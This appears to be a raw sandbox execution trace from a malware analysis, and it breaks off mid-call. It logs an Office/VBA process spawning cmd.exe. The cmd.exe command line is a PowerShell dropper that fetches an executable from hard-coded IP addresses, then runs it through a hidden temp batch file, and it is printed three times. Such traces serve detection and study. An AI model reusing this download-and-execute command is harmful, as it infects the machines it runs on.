hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f3a0 | out: phkResult=0x18f3a0*=0xa30) returned 0x0 [0220.141] RegSetValueExA (in: hKey=0xa30, lpValueName="DsnShowSelected", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x2 | out: lpData="0") returned 0x0 [0220.148] lstrcpyA (in: lpString1=0x18f280, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0220.148] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0220.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x18f250, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0220.148] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0220.148] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x18f420 | out: phkResult=0x18f420*=0xa2c) returned 0x0 [0220.166] IMalloc:Free (This=0x7feffc15380, pv=0x696bf90) [0220.166] IMalloc:Free (This=0x7feffc15380, pv=0x6983950) [0220.166] IMalloc:Free (This=0x7feffc15380, pv=0x680cff0) [0220.166] IMalloc:Free (This=0x7feffc15380, pv=0x6b5ee20) [0220.346] IMalloc:Free (This=0x7feffc15380, pv=0x3e41e70) [0220.346] IMalloc:Free (This=0x7feffc15380, pv=0x3e41240) [0220.346] IMalloc:Free (This=0x7feffc15380, pv=0x3e41650) [0220.346] IMalloc:Free (This=0x7feffc15380, pv=0x3e41a60) [0220.346] DllDebugObjectRPCHook () returned 0x1 [0220.753] __clean_type_info_names_internal () returned 0x0 Thread: id = 22 os_tid = 0x990 Thread: id = 31 os_tid = 0x9d0 Thread: id = 46 os_tid = 0xb4c Thread: id = 343 os_tid = 0x92c Thread: id = 359 os_tid = 0x9b0 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3d0e2000" os_pid = "0x994" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8bc" cmd_line = "cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 504 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 505 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 506 start_va = 0x49e60000 end_va = 0x49eb8fff entry_point = 0x49e60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 507 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 508 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 509 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 510 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 511 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 512 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 513 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 516 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 517 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 518 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 519 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 520 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 521 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 522 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 523 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 524 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 525 start_va = 0x7fef9100000 end_va = 0x7fef9107fff entry_point = 0x7fef9100000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 526 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 527 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 528 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 529 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 530 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 531 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 532 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 533 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 534 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 535 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 536 start_va = 0x520000 end_va = 0x6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 537 start_va = 0x6b0000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 538 start_va = 0x840000 end_va = 0x1c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 539 start_va = 0x1c40000 end_va = 0x1f82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c40000" filename = "" Region: id = 540 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 541 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 542 start_va = 0x1f90000 end_va = 0x225efff entry_point = 0x1f90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 23 os_tid = 0x998 [0042.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe50 | out: lpSystemTimeAsFileTime=0x16fe50*(dwLowDateTime=0xbea6f980, dwHighDateTime=0x1d48db2)) [0042.924] GetCurrentProcessId () returned 0x994 [0042.924] GetCurrentThreadId () returned 0x998 [0042.924] GetTickCount () returned 0x19387 [0042.924] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe58 | out: lpPerformanceCount=0x16fe58*=1811054800000) returned 1 [0042.925] GetModuleHandleW (lpModuleName=0x0) returned 0x49e60000 [0042.925] __set_app_type (_Type=0x1) [0042.925] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e87810) returned 0x0 [0042.925] __getmainargs (in: _Argc=0x49eaa608, _Argv=0x49eaa618, _Env=0x49eaa610, _DoWildCard=0, _StartInfo=0x49e8e0f4 | out: _Argc=0x49eaa608, _Argv=0x49eaa618, _Env=0x49eaa610) returned 0 [0042.926] GetCurrentThreadId () returned 0x998 [0042.926] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x998) returned 0x3c [0042.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77b20000 [0042.926] GetProcAddress (hModule=0x77b20000, lpProcName="SetThreadUILanguage") returned 0x77b36d40 [0042.926] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0042.926] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.926] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fde8 | out: phkResult=0x16fde8*=0x0) returned 0x2 [0042.926] VirtualQuery (in: lpAddress=0x16fdd0, lpBuffer=0x16fd50, dwLength=0x30 | out: lpBuffer=0x16fd50*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.926] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd50, dwLength=0x30 | out: lpBuffer=0x16fd50*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.926] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd50, dwLength=0x30 | out: lpBuffer=0x16fd50*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.927] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16fd50, dwLength=0x30 | out: lpBuffer=0x16fd50*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0042.927] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd50, dwLength=0x30 | out: lpBuffer=0x16fd50*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0042.927] GetConsoleOutputCP () returned 0x1b5 [0042.927] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0042.927] SetConsoleCtrlHandler (HandlerRoutine=0x49e83184, Add=1) returned 1 [0042.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0042.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e8e194 | out: lpMode=0x49e8e194) returned 1 [0042.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e8e198 | out: lpMode=0x49e8e198) returned 1 [0042.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.928] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0042.928] GetEnvironmentStringsW () returned 0x249180* [0042.928] FreeEnvironmentStringsW (penv=0x249180) returned 1 [0042.928] GetEnvironmentStringsW () returned 0x249180* [0042.929] FreeEnvironmentStringsW (penv=0x249180) returned 1 [0042.929] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eca8 | out: phkResult=0x16eca8*=0x44) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x18, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x1, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x1, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x0, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x40, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x40, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x40, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegCloseKey (hKey=0x44) returned 0x0 [0042.929] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eca8 | out: phkResult=0x16eca8*=0x44) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x40, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x1, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x1, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x0, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x9, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x4, lpData=0x16ecc0*=0x9, lpcbData=0x16eca4*=0x4) returned 0x0 [0042.929] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eca0, lpData=0x16ecc0, lpcbData=0x16eca4*=0x1000 | out: lpType=0x16eca0*=0x0, lpData=0x16ecc0*=0x9, lpcbData=0x16eca4*=0x1000) returned 0x2 [0042.929] RegCloseKey (hKey=0x44) returned 0x0 [0042.929] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a21a [0042.929] srand (_Seed=0x5c09a21a) [0042.930] GetCommandLineW () returned="cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"" [0042.930] GetCommandLineW () returned="cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"" [0042.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e9c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0042.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x249190, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0042.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0042.930] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.930] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.930] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0042.930] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0042.930] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0042.930] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0042.930] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0042.930] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0042.930] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0042.930] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0042.930] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0042.930] GetEnvironmentStringsW () returned 0x2493a0* [0042.930] FreeEnvironmentStringsW (penv=0x2493a0) returned 1 [0042.930] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.931] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.931] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0042.931] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0042.931] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0042.931] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0042.931] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0042.931] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0042.931] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0042.931] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0042.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fab0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0042.931] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x16fab0, lpFilePart=0x16fa90 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x16fa90*="Desktop") returned 0x19 [0042.931] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0042.931] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f7c0 | out: lpFindFileData=0x16f7c0) returned 0x24c940 [0042.931] FindClose (in: hFindFile=0x24c940 | out: hFindFile=0x24c940) returned 1 [0042.931] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x16f7c0 | out: lpFindFileData=0x16f7c0) returned 0x24c940 [0042.931] FindClose (in: hFindFile=0x24c940 | out: hFindFile=0x24c940) returned 1 [0042.931] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x16f7c0 | out: lpFindFileData=0x16f7c0) returned 0x24c940 [0042.931] FindClose (in: hFindFile=0x24c940 | out: hFindFile=0x24c940) returned 1 [0042.931] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0042.932] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0042.932] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0042.932] GetEnvironmentStringsW () returned 0x24b2e0* [0042.932] FreeEnvironmentStringsW (penv=0x24b2e0) returned 1 [0042.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e9c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0042.932] GetConsoleOutputCP () returned 0x1b5 [0042.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0042.932] GetUserDefaultLCID () returned 0x409 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e97b50, cchData=8 | out: lpLCData=":") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fbc0, cchData=128 | out: lpLCData="0") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fbc0, cchData=128 | out: lpLCData="0") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fbc0, cchData=128 | out: lpLCData="1") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49eaa740, cchData=8 | out: lpLCData="/") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49eaa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49eaa460, cchData=32 | out: lpLCData="Tue") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49eaa420, cchData=32 | out: lpLCData="Wed") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49eaa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49eaa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49eaa360, cchData=32 | out: lpLCData="Sat") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49eaa700, cchData=32 | out: lpLCData="Sun") returned 4 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e97b40, cchData=8 | out: lpLCData=".") returned 2 [0042.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49eaa4e0, cchData=8 | out: lpLCData=",") returned 2 [0042.933] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0042.934] GetConsoleTitleW (in: lpConsoleTitle=0x24a380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77b20000 [0042.934] GetProcAddress (hModule=0x77b20000, lpProcName="CopyFileExW") returned 0x77b323d0 [0042.934] GetProcAddress (hModule=0x77b20000, lpProcName="IsDebuggerPresent") returned 0x77b28290 [0042.934] GetProcAddress (hModule=0x77b20000, lpProcName="SetConsoleInputExeNameW") returned 0x77b317e0 [0042.935] GetEnvironmentVariableW (in: lpName="tmp", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0042.935] GetEnvironmentVariableW (in: lpName="tmp", 